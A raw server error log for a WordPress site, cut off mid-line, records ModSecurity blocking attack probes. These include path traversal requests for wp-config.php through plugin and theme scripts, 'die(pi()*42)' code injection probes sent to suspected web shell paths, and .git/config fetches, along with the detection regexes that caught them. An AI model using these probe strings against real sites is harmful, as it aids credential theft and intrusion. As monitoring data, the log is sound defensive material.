[Fri Nov 11 05:58:38.477978 2022] [autoindex:error] [pid 7721:tid 140394041939712] [client 172.173.184.58:46716] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 11 09:45:45.966097 2022] [autoindex:error] [pid 7721:tid 140394008368896] [client 66.97.45.248:51744] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Nov 11 09:47:00.396799 2022] [autoindex:error] [pid 7721:tid 140394050332416] [client 66.97.45.248:51794] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Nov 11 11:25:57.523638 2022] [:error] [pid 7106:tid 140394192918272] [client 5.188.62.26:56246] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y253laoIStcHioLDLgThkgAAAII"] [Fri Nov 11 15:43:43.735328 2022] [:error] [pid 7106:tid 140394067117824] [client 5.188.62.76:36128] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y26z_6oIStcHioLDLgTkhQAAAIg"] 2022/11/11 20:38:09 [error] 7066#7066: *85309 access forbidden by rule, client: 34.243.152.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/11 20:38:09 [error] 7066#7066: *85310 access forbidden by rule, client: 34.243.152.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/11 20:38:09 [error] 7067#7067: *85311 access forbidden by rule, client: 34.243.152.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/11 20:38:09 [error] 7066#7066: *85312 access forbidden by rule, client: 34.243.152.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/11 20:38:16 [error] 7066#7066: *85316 access forbidden by rule, client: 34.243.152.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/11 20:38:16 [error] 7067#7067: *85317 access forbidden by rule, client: 34.243.152.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/12 01:36:23 [error] 7067#7067: *95495 access forbidden by rule, client: 174.129.73.239, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Nov 12 03:06:18.791261 2022] [ssl:warn] [pid 28347:tid 140510406551424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 12 03:06:18.913773 2022] [ssl:warn] [pid 28348:tid 140510406551424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 12 03:06:19.257635 2022] [ssl:warn] [pid 28348:tid 140510406551424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 12 03:06:20.655348 2022] [ssl:warn] [pid 28348:tid 140510406551424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 12 03:06:22.928225 2022] [ssl:warn] [pid 28800:tid 140454604302208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 12 03:06:23.069448 2022] [ssl:warn] [pid 28801:tid 140454604302208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 03:13:23.565670 2022] [ssl:warn] [pid 14192:tid 140504220583808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 03:13:23.707546 2022] [ssl:warn] [pid 14193:tid 140504220583808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 03:13:24.099951 2022] [ssl:warn] [pid 14193:tid 140504220583808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 03:13:25.764013 2022] [ssl:warn] [pid 14193:tid 140504220583808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 03:13:28.018456 2022] [ssl:warn] [pid 14606:tid 140471732557696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 03:13:28.128339 2022] [ssl:warn] [pid 14607:tid 140471732557696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 13 09:37:23.190406 2022] [:error] [pid 14626:tid 140471401674496] [client 5.188.62.140:54798] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y3EBI9Y0FpvGUM3YbPRX-wAAAIk"] [Mon Nov 14 03:18:23.273203 2022] [ssl:warn] [pid 924:tid 140655434499968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 14 03:18:23.387415 2022] [ssl:warn] [pid 925:tid 140655434499968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 14 03:18:23.721883 2022] [ssl:warn] [pid 925:tid 140655434499968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 14 03:18:25.373471 2022] [ssl:warn] [pid 925:tid 140655434499968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 14 03:18:27.653773 2022] [ssl:warn] [pid 1572:tid 139802054903680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 14 03:18:27.793749 2022] [ssl:warn] [pid 1573:tid 139802054903680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/11/14 08:53:53 [error] 1555#1555: *133187 access forbidden by rule, client: 35.180.65.143, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Nov 14 15:37:05.736886 2022] [:error] [pid 1594:tid 139801730713344] [client 64.90.36.109:55982] [client 64.90.36.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "Y3Km8Yxtlqnaq9KDDcPbcwAAAEk"] [Mon Nov 14 21:52:28.508777 2022] [autoindex:error] [pid 10916:tid 139801680357120] [client 85.31.44.203:36888] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Nov 14 23:26:53.240454 2022] [:error] [pid 11034:tid 139801621608192] [client 152.89.196.13:38282] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:cdshell. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:cdshell: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/versions.php"] [unique_id "Y3MVDdrZ7m0lNvSmGG1EvAAAAZY"] [Tue Nov 15 00:13:18.641058 2022] [:error] [pid 11032:tid 139801865889536] [client 5.188.62.26:38886] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y3Mf7kL7ih6J0sDRhsgr4AAAAUE"] [Tue Nov 15 00:53:06.067419 2022] [ssl:warn] [pid 992:tid 140257536284544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 00:53:06.743932 2022] [ssl:warn] [pid 1096:tid 140257536284544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/11/15 00:59:08 [error] 1694#1694: *49 connect() failed (111: Connection refused) while connecting to upstream, client: 45.141.151.93, server: investigacionperu.com, request: "POST //xmlrpc.php HTTP/1.1", upstream: "http://198.199.72.26:8181//xmlrpc.php", host: "investigacionperu.com" [Tue Nov 15 00:59:08.144535 2022] [ssl:warn] [pid 3700:tid 140326142338944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 00:59:08.259331 2022] [ssl:warn] [pid 3701:tid 140326142338944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 00:59:08.493340 2022] [ssl:warn] [pid 3701:tid 140326142338944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 00:59:09.885994 2022] [ssl:warn] [pid 3701:tid 140326142338944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 00:59:12.182008 2022] [ssl:warn] [pid 4169:tid 139651542247296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 00:59:12.318178 2022] [ssl:warn] [pid 4170:tid 139651542247296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 03:43:20.984586 2022] [ssl:warn] [pid 14077:tid 140525633763200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 03:43:21.112269 2022] [ssl:warn] [pid 14078:tid 140525633763200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 03:43:21.317066 2022] [ssl:warn] [pid 14078:tid 140525633763200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 03:43:23.007284 2022] [ssl:warn] [pid 14078:tid 140525633763200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 03:43:25.248478 2022] [ssl:warn] [pid 14501:tid 139775636772736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 03:43:25.394444 2022] [ssl:warn] [pid 14502:tid 139775636772736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 04:35:42.575364 2022] [:error] [pid 15222:tid 139775331784448] [client 5.188.62.76:39754] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y3NdbsAhF29e2OIwNfavKAAAAMY"] [Tue Nov 15 05:36:04.416626 2022] [:error] [pid 15222:tid 139775447758592] [client 152.89.196.13:40644] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/wp-admin.php"] [unique_id "Y3NrlMAhF29e2OIwNfavkgAAAME"] [Tue Nov 15 05:36:04.827040 2022] [:error] [pid 15222:tid 139775306606336] [client 152.89.196.13:40646] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/wp-admin.php"] [unique_id "Y3NrlMAhF29e2OIwNfavkwAAAMk"] [Tue Nov 15 08:09:51.828767 2022] [:error] [pid 23738:tid 139775264642816] [client 152.89.196.13:43292] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/wp-includes.php"] [unique_id "Y3OPn4EbINCzlMla52PQsQAAAU4"] [Tue Nov 15 10:46:01.230729 2022] [autoindex:error] [pid 14523:tid 139775289820928] [client 85.31.44.203:48904] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Nov 15 11:17:51.372669 2022] [ssl:warn] [pid 9081:tid 140700332504960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:17:51.506477 2022] [ssl:warn] [pid 9088:tid 140700332504960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:20:35.798659 2022] [ssl:warn] [pid 9966:tid 139827341645696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:20:35.939479 2022] [ssl:warn] [pid 9967:tid 139827341645696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:33:14.070591 2022] [ssl:warn] [pid 14661:tid 140565377746816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:33:14.196241 2022] [ssl:warn] [pid 14663:tid 140565377746816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:43:46.823187 2022] [ssl:warn] [pid 18884:tid 140577622964096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:43:46.949657 2022] [ssl:warn] [pid 18885:tid 140577622964096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 11:47:35.587150 2022] [ssl:warn] [pid 18885:tid 140577622964096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 12:07:51.923676 2022] [ssl:warn] [pid 18885:tid 140577622964096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 13:21:11.877521 2022] [:error] [pid 28331:tid 140577198749440] [client 152.89.196.13:36018] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:atime. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:atime: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gassembly/js/js.php"] [unique_id "Y3PYlwxrHtmGfp9RfPpZaQAAAFU"] [Tue Nov 15 15:43:42.750483 2022] [ssl:warn] [pid 30646:tid 140016534570880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 15:43:42.879408 2022] [ssl:warn] [pid 30647:tid 140016534570880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 15:46:06.118950 2022] [ssl:warn] [pid 30647:tid 140016534570880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 15:46:07.194934 2022] [ssl:warn] [pid 30647:tid 140016534570880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 15:46:49.664330 2022] [ssl:warn] [pid 30647:tid 140016534570880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 15:46:50.436221 2022] [ssl:warn] [pid 30647:tid 140016534570880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 16:07:45.115949 2022] [ssl:warn] [pid 10297:tid 140278672603008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 16:07:45.243583 2022] [ssl:warn] [pid 10298:tid 140278672603008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 15 19:03:41.788697 2022] [ssl:warn] [pid 10298:tid 140278672603008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 02:25:51.388202 2022] [:error] [pid 26520:tid 140278337865472] [client 161.35.61.218:57398] [client 161.35.61.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "Y3SQf7fSsav3qIZP6_z6iQAAAMo"] [Wed Nov 16 03:16:32.391756 2022] [ssl:warn] [pid 15281:tid 140153286702976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 03:16:32.519452 2022] [ssl:warn] [pid 15282:tid 140153286702976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 03:16:33.007933 2022] [ssl:warn] [pid 15282:tid 140153286702976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 03:16:34.515350 2022] [ssl:warn] [pid 15282:tid 140153286702976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 03:16:37.169191 2022] [ssl:warn] [pid 15725:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 03:16:37.292886 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 04:24:43.147528 2022] [:error] [pid 16454:tid 140268028278528] [client 5.188.62.140:60596] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y3SsW8uB6BZpQK02W7YwdQAAAMQ"] [Wed Nov 16 10:24:07.236529 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:24:08.251274 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:24:17.254771 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:39:12.060355 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:41:33.698783 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:46:30.771493 2022] [ssl:warn] [pid 15726:tid 140268311918464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:47:48.048424 2022] [ssl:warn] [pid 15966:tid 140576127416192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:47:48.177767 2022] [ssl:warn] [pid 15967:tid 140576127416192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:49:43.320611 2022] [ssl:warn] [pid 15967:tid 140576127416192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:55:00.099599 2022] [ssl:warn] [pid 19290:tid 140099962173312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 10:55:00.236717 2022] [ssl:warn] [pid 19291:tid 140099962173312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 11:18:58.326856 2022] [ssl:warn] [pid 25088:tid 